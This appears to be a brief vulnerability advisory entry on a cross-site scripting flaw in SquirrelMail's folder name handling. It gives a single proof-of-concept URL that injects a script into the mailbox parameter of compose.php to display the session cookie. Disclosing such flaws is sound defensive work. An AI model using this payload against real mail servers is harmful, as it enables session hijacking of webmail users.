SquirrelMail Folder Name Cross-Site Scripting Vulnerability

info
discussion
exploit
solution
references

SquirrelMail Folder Name Cross-Site Scripting Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/mail/src/compose.php?mailbox=">&lt;script&gt;window.alert(document.cookie)&lt;/script&gt;